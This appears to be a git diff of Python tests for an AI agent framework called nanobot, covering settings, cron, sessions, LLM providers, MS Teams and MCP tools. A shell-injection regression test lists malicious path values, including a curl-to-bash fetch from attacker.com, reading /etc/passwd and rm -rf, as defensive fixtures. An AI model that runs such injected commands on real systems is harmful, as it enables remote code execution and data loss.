async def test_settings_api_returns_safe_subset_and_updates_whitelist(
bus: MagicMock,
monkeypatch,
tmp_path,
) -> None:
port = 29891
config_path = tmp_path / "config.json"
config = Config()
config.agents.defaults.model = "openai/gpt-4o"
config.providers.openai.api_key = "secret-key"
save_config(config, config_path)
monkeypatch.setattr("nanobot.config.loader._current_config_path", config_path)
channel = _ch(bus, port=port)
channel._api_tokens["tok"] = time.monotonic() + 300
server_task = asyncio.create_task(channel.start())
await asyncio.sleep(0.3)
try:
settings = await _http_get(
f"http://127.0.0.1:{port}/api/settings",
headers={"Authorization": "Bearer tok"},
)
assert settings.status_code == 200
body = settings.json()
assert body["agent"]["model"] == "openai/gpt-4o"
assert body["agent"]["provider"] == "openai"
assert {"name": "auto", "label": "Auto"} in body["providers"]
assert body["agent"]["has_api_key"] is True
assert "secret-key" not in settings.text
updated = await _http_get(
"http://127.0.0.1:"
f"{port}/api/settings/update?model=openrouter/test"
"&provider=openrouter",
headers={"Authorization": "Bearer tok"},
)
assert updated.status_code == 200
assert updated.json()["requires_restart"] is True
saved = load_config(config_path)
assert saved.agents.defaults.model == "openrouter/test"
assert saved.agents.defaults.provider == "openrouter"
finally:
await channel.stop()
await server_task
def test_settings_payload_normalizes_camel_case_provider(
bus: MagicMock,
monkeypatch,
tmp_path,
) -> None:
config_path = tmp_path / "config.json"
config = Config()
config.agents.defaults.provider = "minimaxAnthropic"
save_config(config, config_path)
monkeypatch.setattr("nanobot.config.loader._current_config_path", config_path)
body = _ch(bus)._settings_payload()
assert body["agent"]["provider"] == "minimax_anthropic"
@pytest.mark.asyncio
async def test_end_to_end_server_pushes_streaming_deltas_to_client(bus: MagicMock) -> None:
port = 29880

View File

@ -12,6 +12,7 @@ from nanobot.bus.events import OutboundMessage
from nanobot.cli.commands import _make_provider, app
from nanobot.config.schema import Config
from nanobot.cron.types import CronJob, CronPayload
from nanobot.providers.factory import ProviderSnapshot
from nanobot.providers.openai_codex_provider import _strip_model_prefix
from nanobot.providers.registry import find_by_name
@ -776,6 +777,15 @@ def _stop_gateway_provider(_config) -> object:
raise _StopGatewayError("stop")
def _test_provider_snapshot(provider: object, config: Config) -> ProviderSnapshot:
return ProviderSnapshot(
provider=provider,
model=config.agents.defaults.model,
context_window_tokens=config.agents.defaults.context_window_tokens,
signature=("test",),
)
def _patch_cli_command_runtime(
monkeypatch,
config: Config,
@ -788,6 +798,8 @@ def _patch_cli_command_runtime(
cron_service=None,
get_cron_dir=None,
) -> None:
provider_factory = make_provider or (lambda _config: object())
monkeypatch.setattr(
"nanobot.config.loader.set_config_path",
set_config_path or (lambda _path: None),
@ -800,7 +812,15 @@ def _patch_cli_command_runtime(
)
monkeypatch.setattr(
"nanobot.cli.commands._make_provider",
make_provider or (lambda _config: object()),
provider_factory,
)
monkeypatch.setattr(
"nanobot.providers.factory.build_provider_snapshot",
lambda _config: _test_provider_snapshot(provider_factory(_config), _config),
)
monkeypatch.setattr(
"nanobot.providers.factory.load_provider_snapshot",
lambda _config_path=None: _test_provider_snapshot(provider_factory(config), config),
)
if message_bus is not None:
@ -941,8 +961,36 @@ def test_gateway_cron_evaluator_receives_scheduled_reminder_context(
monkeypatch.setattr("nanobot.config.loader.load_config", lambda _path=None: config)
monkeypatch.setattr("nanobot.cli.commands.sync_workspace_templates", lambda _path: None)
monkeypatch.setattr("nanobot.cli.commands._make_provider", lambda _config: provider)
monkeypatch.setattr(
"nanobot.providers.factory.build_provider_snapshot",
lambda _config: _test_provider_snapshot(provider, _config),
)
monkeypatch.setattr(
"nanobot.providers.factory.load_provider_snapshot",
lambda _config_path=None: _test_provider_snapshot(provider, config),
)
monkeypatch.setattr("nanobot.bus.queue.MessageBus", lambda: bus)
monkeypatch.setattr("nanobot.session.manager.SessionManager", lambda _workspace: object())
class _FakeSession:
def __init__(self) -> None:
self.messages = []
def add_message(self, role: str, content: str, **kwargs) -> None:
self.messages.append({"role": role, "content": content, **kwargs})
class _FakeSessionManager:
def __init__(self, _workspace: Path) -> None:
self.session = _FakeSession()
seen["session_manager"] = self
def get_or_create(self, key: str) -> _FakeSession:
seen["session_key"] = key
return self.session
def save(self, session: _FakeSession) -> None:
seen["saved_session"] = session
monkeypatch.setattr("nanobot.session.manager.SessionManager", _FakeSessionManager)
class _FakeCron:
def __init__(self, _store_path: Path) -> None:
@ -1019,9 +1067,11 @@ def test_gateway_cron_evaluator_receives_scheduled_reminder_context(
assert seen["provider"] is provider
assert seen["model"] == "test-model"
assert seen["task_context"] == (
"[Scheduled Task] Timer finished.\n\n"
"Task 'stretch' has been triggered.\n"
"Scheduled instruction: Remind me to stretch."
"The scheduled time has arrived. Deliver this reminder to the user now, "
"as a brief and natural message in their language. Speak directly to them — "
"do not narrate progress, summarize, include user IDs, or add status reports "
"like 'Done' or 'Reminded'.\n\n"
"Reminder: Remind me to stretch."
)
bus.publish_outbound.assert_awaited_once_with(
OutboundMessage(
@ -1030,6 +1080,16 @@ def test_gateway_cron_evaluator_receives_scheduled_reminder_context(
content="Time to stretch.",
)
)
assert seen["session_key"] == "telegram:user-1"
saved_session = seen["saved_session"]
assert isinstance(saved_session, _FakeSession)
assert saved_session.messages == [
{
"role": "assistant",
"content": "Time to stretch.",
"_channel_delivery": True,
}
]
def test_gateway_cron_job_suppresses_intermediate_progress(
@ -1052,6 +1112,14 @@ def test_gateway_cron_job_suppresses_intermediate_progress(
monkeypatch.setattr("nanobot.config.loader.load_config", lambda _path=None: config)
monkeypatch.setattr("nanobot.cli.commands.sync_workspace_templates", lambda _path: None)
monkeypatch.setattr("nanobot.cli.commands._make_provider", lambda _config: object())
monkeypatch.setattr(
"nanobot.providers.factory.build_provider_snapshot",
lambda _config: _test_provider_snapshot(object(), _config),
)
monkeypatch.setattr(
"nanobot.providers.factory.load_provider_snapshot",
lambda _config_path=None: _test_provider_snapshot(object(), config),
)
monkeypatch.setattr("nanobot.bus.queue.MessageBus", lambda: bus)
monkeypatch.setattr("nanobot.session.manager.SessionManager", lambda _workspace: object())

View File

@ -43,6 +43,59 @@ def test_add_job_accepts_valid_timezone(tmp_path) -> None:
assert job.state.next_run_at_ms is not None
def test_add_job_preserves_channel_meta_and_session_key(tmp_path) -> None:
service = CronService(tmp_path / "cron" / "jobs.json")
meta = {"slack": {"thread_ts": "1234567890.123456", "channel_type": "channel"}}
job = service.add_job(
name="thread test",
schedule=CronSchedule(kind="every", every_ms=60_000),
message="hello",
deliver=True,
channel="slack",
to="C123",
channel_meta=meta,
session_key="slack:C123:1234567890.123456",
)
assert job.payload.channel_meta == meta
assert job.payload.session_key == "slack:C123:1234567890.123456"
reloaded = service.get_job(job.id)
assert reloaded is not None
assert reloaded.payload.channel_meta == meta
assert reloaded.payload.session_key == "slack:C123:1234567890.123456"
@pytest.mark.asyncio
async def test_channel_meta_and_session_key_survive_store_reload(tmp_path) -> None:
store_path = tmp_path / "cron" / "jobs.json"
service = CronService(store_path)
await service.start()
meta = {"slack": {"thread_ts": "1234567890.123456", "channel_type": "channel"}}
try:
job = service.add_job(
name="thread test",
schedule=CronSchedule(kind="every", every_ms=60_000),
message="hello",
deliver=True,
channel="slack",
to="C123",
channel_meta=meta,
session_key="slack:C123:1234567890.123456",
)
finally:
service.stop()
raw = json.loads(store_path.read_text(encoding="utf-8"))
payload = raw["jobs"][0]["payload"]
assert payload["channelMeta"] == meta
assert payload["sessionKey"] == "slack:C123:1234567890.123456"
reloaded = CronService(store_path).get_job(job.id)
assert reloaded is not None
assert reloaded.payload.channel_meta == meta
assert reloaded.payload.session_key == "slack:C123:1234567890.123456"
@pytest.mark.asyncio
async def test_execute_job_records_run_history(tmp_path) -> None:
store_path = tmp_path / "cron" / "jobs.json"

View File

@ -382,6 +382,21 @@ def test_add_job_empty_message_returns_actionable_error(tmp_path) -> None:
assert "Retry including message=" in result
def test_add_job_captures_metadata_and_session_key(tmp_path) -> None:
"""CronTool stores channel metadata and session_key when adding a job."""
tool = _make_tool(tmp_path)
meta = {"slack": {"thread_ts": "111.222", "channel_type": "channel"}}
tool.set_context("slack", "C99", metadata=meta, session_key="slack:C99:111.222")
result = tool._add_job("test", "say hi", 60, None, None, None)
assert "Created job" in result
jobs = tool._cron.list_jobs()
assert len(jobs) == 1
assert jobs[0].payload.channel_meta == meta
assert jobs[0].payload.session_key == "slack:C99:111.222"
def test_list_excludes_disabled_jobs(tmp_path) -> None:
tool = _make_tool(tmp_path)
job = tool._cron.add_job(

View File

@ -0,0 +1,120 @@
"""Tests for heartbeat context bridge — injecting delivered messages into channel session."""
from nanobot.session.manager import SessionManager
class TestHeartbeatContextBridge:
"""Verify that on_heartbeat_notify injects the assistant message into the
channel session so user replies have conversational context."""
def test_notify_injects_into_channel_session(self, tmp_path):
"""After notify, the target channel session should contain the
heartbeat response as an assistant turn."""
session_mgr = SessionManager(tmp_path / "sessions")
target_key = "telegram:12345"
# Simulate: session exists with one user message
target_session = session_mgr.get_or_create(target_key)
target_session.add_message("user", "hello earlier")
session_mgr.save(target_session)
# Simulate what on_heartbeat_notify does
target_session = session_mgr.get_or_create(target_key)
target_session.add_message(
"assistant",
"3 new emails — invoice, meeting, proposal.",
_channel_delivery=True,
)
session_mgr.save(target_session)
# Reload and verify
reloaded = session_mgr.get_or_create(target_key)
messages = reloaded.get_history(max_messages=0)
roles = [m["role"] for m in messages]
assert roles == ["user", "assistant"]
assert "3 new emails" in messages[-1]["content"]
def test_reply_after_injection_has_context(self, tmp_path):
"""Simulates the full flow: prior conversation exists, heartbeat
injects, then user replies. The session should have the heartbeat
message visible in get_history so the model sees the context."""
session_mgr = SessionManager(tmp_path / "sessions")
target_key = "telegram:12345"
# Pre-existing conversation (user has chatted before)
session = session_mgr.get_or_create(target_key)
session.add_message("user", "Hey")
session.add_message("assistant", "Hi there!")
session_mgr.save(session)
# Step 1: heartbeat injects assistant message
session = session_mgr.get_or_create(target_key)
session.add_message(
"assistant",
"If you want, I can mark that email as read.",
_channel_delivery=True,
)
session_mgr.save(session)
# Step 2: user replies "Sure"
session = session_mgr.get_or_create(target_key)
session.add_message("user", "Sure")
session_mgr.save(session)
# Verify: get_history includes the heartbeat injection
reloaded = session_mgr.get_or_create(target_key)
history = reloaded.get_history(max_messages=0)
roles = [m["role"] for m in history]
assert roles == ["user", "assistant", "assistant", "user"]
assert "mark that email" in history[2]["content"]
assert history[3]["content"] == "Sure"
def test_injection_does_not_duplicate_on_existing_history(self, tmp_path):
"""If the channel session already has messages, the injection
appends cleanly without corruption."""
session_mgr = SessionManager(tmp_path / "sessions")
target_key = "telegram:12345"
# Pre-existing conversation
session = session_mgr.get_or_create(target_key)
session.add_message("user", "What time is it?")
session.add_message("assistant", "It's 2pm.")
session.add_message("user", "Thanks")
session_mgr.save(session)
# Heartbeat injects
session = session_mgr.get_or_create(target_key)
session.add_message(
"assistant",
"You have a meeting in 30 minutes.",
_channel_delivery=True,
)
session_mgr.save(session)
# Verify
reloaded = session_mgr.get_or_create(target_key)
history = reloaded.get_history(max_messages=0)
roles = [m["role"] for m in history]
assert roles == ["user", "assistant", "user", "assistant"]
assert "meeting in 30 minutes" in history[-1]["content"]
def test_reply_after_injection_to_empty_session_keeps_context(self, tmp_path):
"""A user replying to the first delivered message still sees that context."""
session_mgr = SessionManager(tmp_path / "sessions")
target_key = "telegram:99999"
session = session_mgr.get_or_create(target_key)
session.add_message(
"assistant",
"Weather alert: sandstorm expected at 4pm.",
_channel_delivery=True,
)
session.add_message("user", "Sure")
session_mgr.save(session)
reloaded = session_mgr.get_or_create(target_key)
history = reloaded.get_history(max_messages=0)
assert len(history) == 2
assert history[0]["role"] == "assistant"
assert "sandstorm" in history[0]["content"]
assert history[1] == {"role": "user", "content": "Sure"}

View File

@ -585,6 +585,81 @@ def test_openai_compat_preserves_message_level_reasoning_fields() -> None:
assert sanitized[1]["tool_calls"][0]["extra_content"] == {"google": {"thought_signature": "sig"}}
def _deepseek_kwargs(messages: list[dict]) -> dict:
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
provider = OpenAICompatProvider(
api_key="sk-test",
default_model="deepseek-v4-flash",
spec=find_by_name("deepseek"),
)
return provider._build_kwargs(
messages=messages,
tools=None,
model="deepseek-v4-flash",
max_tokens=1024,
temperature=0.7,
reasoning_effort="high",
tool_choice=None,
)
def _tool_call(call_id: str) -> dict:
return {
"id": call_id,
"type": "function",
"function": {"name": "my", "arguments": "{}"},
}
def test_deepseek_thinking_drops_tool_history_missing_reasoning_content() -> None:
kwargs = _deepseek_kwargs([
{"role": "system", "content": "system"},
{"role": "user", "content": "can we use wechat?"},
{"role": "assistant", "content": "", "tool_calls": [_tool_call("call_bad")]},
{"role": "tool", "tool_call_id": "call_bad", "name": "my", "content": "channels"},
{"role": "user", "content": "continue"},
])
assert kwargs["messages"] == [
{"role": "system", "content": "system"},
{"role": "user", "content": "continue"},
]
def test_deepseek_thinking_keeps_tool_history_with_reasoning_content() -> None:
kwargs = _deepseek_kwargs([
{"role": "user", "content": "can we use wechat?"},
{
"role": "assistant",
"content": "",
"reasoning_content": "I should inspect supported channels.",
"tool_calls": [_tool_call("call_good")],
},
{"role": "tool", "tool_call_id": "call_good", "name": "my", "content": "channels"},
{"role": "user", "content": "continue"},
])
assistant = kwargs["messages"][1]
assert assistant["role"] == "assistant"
assert assistant["reasoning_content"] == "I should inspect supported channels."
assert kwargs["messages"][2]["role"] == "tool"
def test_deepseek_thinking_drops_current_bad_tool_turn_without_followup_user() -> None:
kwargs = _deepseek_kwargs([
{"role": "system", "content": "system"},
{"role": "user", "content": "can we use wechat?"},
{"role": "assistant", "content": "", "tool_calls": [_tool_call("call_bad")]},
{"role": "tool", "tool_call_id": "call_bad", "name": "my", "content": "channels"},
])
assert kwargs["messages"] == [
{"role": "system", "content": "system"},
{"role": "user", "content": "can we use wechat?"},
]
def test_openai_compat_keeps_tool_calls_after_consecutive_assistant_messages() -> None:
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
provider = OpenAICompatProvider()

View File

@ -0,0 +1,118 @@
"""Tests for _is_local_endpoint detection and keepalive configuration."""
from unittest.mock import MagicMock
from nanobot.providers.openai_compat_provider import (
OpenAICompatProvider,
_is_local_endpoint,
)
def _make_spec(is_local: bool = False) -> MagicMock:
spec = MagicMock()
spec.is_local = is_local
return spec
class TestIsLocalEndpoint:
"""Test the _is_local_endpoint helper."""
def test_spec_is_local_true(self):
assert _is_local_endpoint(_make_spec(is_local=True), None) is True
def test_spec_is_local_false_no_base(self):
assert _is_local_endpoint(_make_spec(is_local=False), None) is False
def test_no_spec_no_base(self):
assert _is_local_endpoint(None, None) is False
def test_localhost(self):
assert _is_local_endpoint(None, "http://localhost:1234/v1") is True
def test_localhost_https(self):
assert _is_local_endpoint(None, "https://localhost:8080/v1") is True
def test_loopback_127(self):
assert _is_local_endpoint(None, "http://127.0.0.1:11434/v1") is True
def test_private_192_168(self):
assert _is_local_endpoint(None, "http://192.168.8.188:1234/v1") is True
def test_private_10(self):
assert _is_local_endpoint(None, "http://10.0.0.5:8000/v1") is True
def test_private_172_16(self):
assert _is_local_endpoint(None, "http://172.16.0.1:1234/v1") is True
def test_private_172_31(self):
assert _is_local_endpoint(None, "http://172.31.255.255:1234/v1") is True
def test_not_private_172_32(self):
assert _is_local_endpoint(None, "http://172.32.0.1:1234/v1") is False
def test_docker_internal(self):
assert _is_local_endpoint(None, "http://host.docker.internal:11434/v1") is True
def test_ipv6_loopback(self):
assert _is_local_endpoint(None, "http://[::1]:1234/v1") is True
def test_public_api(self):
assert _is_local_endpoint(None, "https://api.openai.com/v1") is False
def test_openrouter(self):
assert _is_local_endpoint(None, "https://openrouter.ai/api/v1") is False
def test_spec_overrides_public_url(self):
"""spec.is_local=True takes precedence even with a public-looking URL."""
assert _is_local_endpoint(_make_spec(is_local=True), "https://api.example.com/v1") is True
def test_case_insensitive(self):
assert _is_local_endpoint(None, "http://LOCALHOST:1234/v1") is True
def test_trailing_slash(self):
assert _is_local_endpoint(None, "http://192.168.1.1:8080/v1/") is True
def test_public_hostname_containing_localhost_is_not_local(self):
assert _is_local_endpoint(None, "https://notlocalhost.example/v1") is False
def test_public_hostname_containing_private_ip_prefix_is_not_local(self):
assert _is_local_endpoint(None, "https://api10.example.com/v1") is False
def test_url_without_scheme(self):
assert _is_local_endpoint(None, "192.168.1.1:8080/v1") is True
class TestLocalKeepaliveConfig:
"""Verify that local endpoints get keepalive_expiry=0."""
def test_local_spec_disables_keepalive(self):
spec = _make_spec(is_local=True)
spec.env_key = ""
spec.default_api_base = "http://localhost:11434/v1"
provider = OpenAICompatProvider(
api_key="test", api_base="http://localhost:11434/v1", spec=spec,
)
pool = provider._client._client._transport._pool
assert pool._keepalive_expiry == 0
def test_lan_ip_disables_keepalive(self):
"""A generic 'openai' spec with a LAN IP should still disable keepalive."""
spec = _make_spec(is_local=False)
spec.env_key = ""
spec.default_api_base = None
provider = OpenAICompatProvider(
api_key="test", api_base="http://192.168.8.188:1234/v1", spec=spec,
)
pool = provider._client._client._transport._pool
assert pool._keepalive_expiry == 0
def test_cloud_keeps_default_keepalive(self):
spec = _make_spec(is_local=False)
spec.env_key = ""
spec.default_api_base = "https://api.openai.com/v1"
provider = OpenAICompatProvider(
api_key="test", api_base=None, spec=spec,
)
pool = provider._client._client._transport._pool
# Default httpx keepalive is 5.0s
assert pool._keepalive_expiry == 5.0

View File

@ -9,6 +9,17 @@ from types import SimpleNamespace
from unittest.mock import patch
from nanobot.providers.openai_compat_provider import OpenAICompatProvider
from nanobot.providers.registry import ProviderSpec
_STEPFUN_SPEC = ProviderSpec(
name="stepfun",
keywords=("stepfun", "step"),
env_key="STEPFUN_API_KEY",
display_name="Step Fun",
backend="openai_compat",
default_api_base="https://api.stepfun.com/v1",
reasoning_as_content=True,
)
# ── _parse: dict branch ─────────────────────────────────────────────────────
@ -17,7 +28,7 @@ from nanobot.providers.openai_compat_provider import OpenAICompatProvider
def test_parse_dict_stepfun_reasoning_fallback() -> None:
"""When content is None and reasoning exists, content falls back to reasoning."""
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
provider = OpenAICompatProvider()
provider = OpenAICompatProvider(spec=_STEPFUN_SPEC)
response = {
"choices": [{
@ -39,7 +50,7 @@ def test_parse_dict_stepfun_reasoning_fallback() -> None:
def test_parse_dict_stepfun_reasoning_priority() -> None:
"""reasoning_content field takes priority over reasoning when both present."""
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
provider = OpenAICompatProvider()
provider = OpenAICompatProvider(spec=_STEPFUN_SPEC)
response = {
"choices": [{
@ -75,7 +86,7 @@ def _make_sdk_message(content, reasoning=None, reasoning_content=None):
def test_parse_sdk_stepfun_reasoning_fallback() -> None:
"""SDK branch: content falls back to msg.reasoning when content is None."""
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
provider = OpenAICompatProvider()
provider = OpenAICompatProvider(spec=_STEPFUN_SPEC)
msg = _make_sdk_message(content=None, reasoning="After analysis: result is 4.")
choice = SimpleNamespace(finish_reason="stop", message=msg)
@ -90,7 +101,7 @@ def test_parse_sdk_stepfun_reasoning_fallback() -> None:
def test_parse_sdk_stepfun_reasoning_priority() -> None:
"""reasoning_content field takes priority over reasoning in SDK branch."""
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
provider = OpenAICompatProvider()
provider = OpenAICompatProvider(spec=_STEPFUN_SPEC)
msg = _make_sdk_message(
content=None,
@ -244,3 +255,44 @@ def test_parse_chunks_sdk_reasoning_precedence() -> None:
result = OpenAICompatProvider._parse_chunks(chunks)
assert result.reasoning_content == "formal: "
# ── Regression: non-StepFun providers must NOT promote reasoning to content ─
def test_parse_dict_non_stepfun_no_reasoning_as_content() -> None:
"""Providers without reasoning_as_content flag must not treat reasoning as content."""
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
provider = OpenAICompatProvider()
response = {
"choices": [{
"message": {
"content": None,
"reasoning": "internal thought process that should NOT be shown to user",
},
"finish_reason": "stop",
}],
}
result = provider._parse(response)
# content stays None — reasoning is NOT promoted
assert result.content is None
# reasoning still goes to reasoning_content for display as thinking
assert result.reasoning_content == "internal thought process that should NOT be shown to user"
def test_parse_sdk_non_stepfun_no_reasoning_as_content() -> None:
"""SDK branch: providers without flag must not treat reasoning as content."""
with patch("nanobot.providers.openai_compat_provider.AsyncOpenAI"):
provider = OpenAICompatProvider()
msg = _make_sdk_message(content=None, reasoning="internal monologue")
choice = SimpleNamespace(finish_reason="stop", message=msg)
response = SimpleNamespace(choices=[choice], usage=None)
result = provider._parse(response)
assert result.content is None
assert result.reasoning_content == "internal monologue"

View File

@ -1,4 +1,5 @@
import json
import time
import pytest
@ -512,6 +513,17 @@ def test_sanitize_inbound_text_keeps_normal_inline_message(make_channel):
assert ch._sanitize_inbound_text(activity) == "normal inline message"
def test_sanitize_inbound_text_normalizes_nbsp_entities(make_channel):
ch = make_channel()
activity = {
"text": "Hello&nbsp;from&nbsp;Teams",
"channelData": {},
}
assert ch._sanitize_inbound_text(activity) == "Hello from Teams"
def test_sanitize_inbound_text_normalizes_reply_wrapper_without_reply_metadata(make_channel):
ch = make_channel()
@ -623,7 +635,7 @@ async def test_get_access_token_uses_configured_tenant(make_channel):
@pytest.mark.asyncio
async def test_send_replies_to_activity_when_reply_in_thread_enabled(make_channel):
async def test_send_posts_to_conversation_with_reply_to_id_when_reply_in_thread_enabled(make_channel):
ch = make_channel(replyInThread=True)
fake_http = FakeHttpClient()
ch._http = fake_http
@ -639,7 +651,7 @@ async def test_send_replies_to_activity_when_reply_in_thread_enabled(make_channe
assert len(fake_http.calls) == 1
url, kwargs = fake_http.calls[0]
assert url == "https://smba.trafficmanager.net/amer/v3/conversations/conv-123/activities/activity-1"
assert url == "https://smba.trafficmanager.net/amer/v3/conversations/conv-123/activities"
assert kwargs["headers"]["Authorization"] == "Bearer tok"
assert kwargs["json"]["text"] == "Reply text"
assert kwargs["json"]["replyToId"] == "activity-1"
@ -830,6 +842,38 @@ async def test_start_logs_install_hint_when_pyjwt_missing(make_channel, monkeypa
assert errors == ["PyJWT not installed. Run: pip install nanobot-ai[msteams]"]
def test_save_refs_prunes_webchat_and_stale_refs(make_channel):
ch = make_channel()
now = time.time()
ch._conversation_refs = {
"teams-good": ConversationRef(
service_url="https://smba.trafficmanager.net/amer/",
conversation_id="teams-good",
conversation_type="personal",
updated_at=now,
),
"webchat-bad": ConversationRef(
service_url="https://webchat.botframework.com/",
conversation_id="webchat-bad",
conversation_type=None,
updated_at=now,
),
"teams-stale": ConversationRef(
service_url="https://smba.trafficmanager.net/amer/",
conversation_id="teams-stale",
conversation_type="personal",
updated_at=now - (31 * 24 * 60 * 60),
),
}
ch._save_refs()
assert set(ch._conversation_refs) == {"teams-good"}
saved = json.loads(ch._refs_path.read_text(encoding="utf-8"))
assert set(saved) == {"teams-good"}
assert saved["teams-good"]["updated_at"] == pytest.approx(now)
def test_msteams_default_config_includes_restart_notify_fields():
cfg = MSTeamsChannel.default_config()

View File

@ -74,3 +74,75 @@ async def test_exec_allowed_env_keys_missing_var_ignored(monkeypatch):
tool = ExecTool(allowed_env_keys=["NONEXISTENT_VAR_12345"])
result = await tool.execute(command="printenv NONEXISTENT_VAR_12345")
assert "Exit code: 1" in result
# --- path_append injection prevention ------------------------------------
@_UNIX_ONLY
@pytest.mark.asyncio
@pytest.mark.parametrize(
"malicious_path",
[
# semicolon — classic command separator
'/tmp/bin; echo INJECTED',
# command substitution via $()
'/tmp/bin; echo $(whoami)',
# backtick command substitution
"/tmp/bin; echo `id`",
# pipe to another command
'/tmp/bin; cat /etc/passwd',
# chained with &&
'/tmp/bin && curl http://attacker.com/shell.sh | bash',
# newline injection
'/tmp/bin\necho INJECTED',
# mixed shell metacharacters
'/tmp/bin; rm -rf /tmp/test_inject_marker; echo CLEANED',
],
)
async def test_exec_path_append_shell_metacharacters_not_executed(malicious_path, tmp_path):
"""Shell metacharacters in path_append must NOT be interpreted as commands.
Regression test for: path_append was previously concatenated into a shell
command string via f'export PATH="$PATH:{path_append}"; {command}', which
allowed shell injection. After the fix, path_append is passed through the
env dict so metacharacters are treated as literal path characters.
"""
tool = ExecTool(path_append=malicious_path)
result = await tool.execute(command="echo SAFE_OUTPUT")
# The original command should succeed
assert "SAFE_OUTPUT" in result
# None of the injected payloads should have produced side-effects
assert "INJECTED" not in result
assert "root:" not in result # /etc/passwd content
@_UNIX_ONLY
@pytest.mark.asyncio
async def test_exec_path_append_command_substitution_does_not_execute(tmp_path):
"""$() in path_append must not trigger command substitution.
We create a marker file and try to read it via $(cat ...). If command
substitution works, the marker content appears in output.
"""
marker = tmp_path / "secret_marker.txt"
marker.write_text("SHOULD_NOT_APPEAR")
tool = ExecTool(
path_append=f'/tmp/bin; echo $(cat {marker})',
)
result = await tool.execute(command="echo OK")
assert "OK" in result
assert "SHOULD_NOT_APPEAR" not in result
@_UNIX_ONLY
@pytest.mark.asyncio
async def test_exec_path_append_legitimate_path_still_works():
"""A normal, safe path_append value must still be appended to PATH."""
tool = ExecTool(path_append="/opt/custom/bin")
result = await tool.execute(command="echo $PATH")
assert "/opt/custom/bin" in result

View File

@ -148,23 +148,33 @@ class TestSpawnWindows:
class TestPathAppendPlatform:
@pytest.mark.asyncio
async def test_unix_injects_export(self):
"""On Unix, path_append is an export statement prepended to command."""
async def test_unix_uses_env_var_in_fixed_export(self):
"""On Unix, path_append must not be interpolated into shell source."""
mock_proc = AsyncMock()
mock_proc.communicate.return_value = (b"ok", b"")
mock_proc.returncode = 0
captured_cmd = None
captured_env = {}
async def capture_spawn(cmd, cwd, env):
nonlocal captured_cmd
captured_cmd = cmd
captured_env.update(env)
return mock_proc
with (
patch("nanobot.agent.tools.shell._IS_WINDOWS", False),
patch.object(ExecTool, "_spawn", return_value=mock_proc) as mock_spawn,
patch("nanobot.agent.tools.shell.os.pathsep", ":"),
patch.object(ExecTool, "_spawn", side_effect=capture_spawn),
patch.object(ExecTool, "_guard_command", return_value=None),
):
tool = ExecTool(path_append="/opt/bin")
tool = ExecTool(path_append="/opt/bin; echo INJECTED")
await tool.execute(command="ls")
spawned_cmd = mock_spawn.call_args[0][0]
assert 'export PATH="$PATH:/opt/bin"' in spawned_cmd
assert spawned_cmd.endswith("ls")
assert captured_cmd == 'export PATH="$PATH:$NANOBOT_PATH_APPEND"; ls'
assert captured_env["NANOBOT_PATH_APPEND"] == "/opt/bin; echo INJECTED"
assert "INJECTED" not in captured_cmd
@pytest.mark.asyncio
async def test_windows_modifies_env(self):
@ -181,6 +191,7 @@ class TestPathAppendPlatform:
with (
patch("nanobot.agent.tools.shell._IS_WINDOWS", True),
patch("nanobot.agent.tools.shell.os.pathsep", ";"),
patch.object(ExecTool, "_spawn", side_effect=capture_spawn),
patch.object(ExecTool, "_guard_command", return_value=None),
):

View File

@ -13,6 +13,7 @@ from nanobot.agent.tools.mcp import (
MCPResourceWrapper,
MCPToolWrapper,
_normalize_windows_stdio_command,
_sanitize_name,
connect_mcp_servers,
)
from nanobot.agent.tools.registry import ToolRegistry
@ -798,3 +799,114 @@ async def test_connect_registers_resources_and_prompts(
assert "mcp_test_tool_a" in registry.tool_names
assert "mcp_test_resource_res_b" in registry.tool_names
assert "mcp_test_prompt_prompt_c" in registry.tool_names
# ---------------------------------------------------------------------------
# _sanitize_name tests
# ---------------------------------------------------------------------------
def test_sanitize_name_replaces_spaces() -> None:
assert _sanitize_name("PostgreSQL System Information") == "PostgreSQL_System_Information"
def test_sanitize_name_replaces_special_characters() -> None:
assert _sanitize_name("foo.bar@baz!") == "foo_bar_baz_"
def test_sanitize_name_collapses_consecutive_underscores() -> None:
assert _sanitize_name("a b") == "a_b"
def test_sanitize_name_preserves_valid_characters() -> None:
assert _sanitize_name("my-tool_v2") == "my-tool_v2"
def test_sanitize_name_noop_for_already_clean_names() -> None:
assert _sanitize_name("mcp_server_tool") == "mcp_server_tool"
# ---------------------------------------------------------------------------
# Wrapper sanitization tests
# ---------------------------------------------------------------------------
def test_tool_wrapper_sanitizes_name() -> None:
tool_def = SimpleNamespace(
name="My Tool",
description="tool with spaces",
inputSchema={"type": "object", "properties": {}},
)
wrapper = MCPToolWrapper(SimpleNamespace(call_tool=None), "srv", tool_def)
assert wrapper.name == "mcp_srv_My_Tool"
def test_resource_wrapper_sanitizes_name() -> None:
resource_def = SimpleNamespace(
name="PostgreSQL System Information",
uri="file:///pg/info",
description="PG info",
)
wrapper = MCPResourceWrapper(None, "srv", resource_def)
assert wrapper.name == "mcp_srv_resource_PostgreSQL_System_Information"
def test_prompt_wrapper_sanitizes_name() -> None:
prompt_def = SimpleNamespace(
name="design-schema",
description="Design schema",
arguments=None,
)
# Hyphens are allowed, so this should pass through unchanged
wrapper = MCPPromptWrapper(None, "my server", prompt_def)
assert wrapper.name == "mcp_my_server_prompt_design-schema"
def test_tool_wrapper_preserves_original_name_for_mcp_call() -> None:
tool_def = SimpleNamespace(
name="My Tool",
description="tool with spaces",
inputSchema={"type": "object", "properties": {}},
)
wrapper = MCPToolWrapper(SimpleNamespace(call_tool=None), "srv", tool_def)
# The sanitized API-facing name differs from the original MCP name
assert wrapper.name == "mcp_srv_My_Tool"
assert wrapper._original_name == "My Tool"
@pytest.mark.asyncio
async def test_connect_mcp_servers_sanitizes_resource_names(
fake_mcp_runtime: dict[str, object | None],
) -> None:
fake_mcp_runtime["session"] = _make_fake_session_with_capabilities(
tool_names=[],
resource_names=["PostgreSQL System Information"],
prompt_names=[],
)
registry = ToolRegistry()
stacks = await connect_mcp_servers(
{"test": MCPServerConfig(command="fake")},
registry,
)
for stack in stacks.values():
await stack.aclose()
assert "mcp_test_resource_PostgreSQL_System_Information" in registry.tool_names
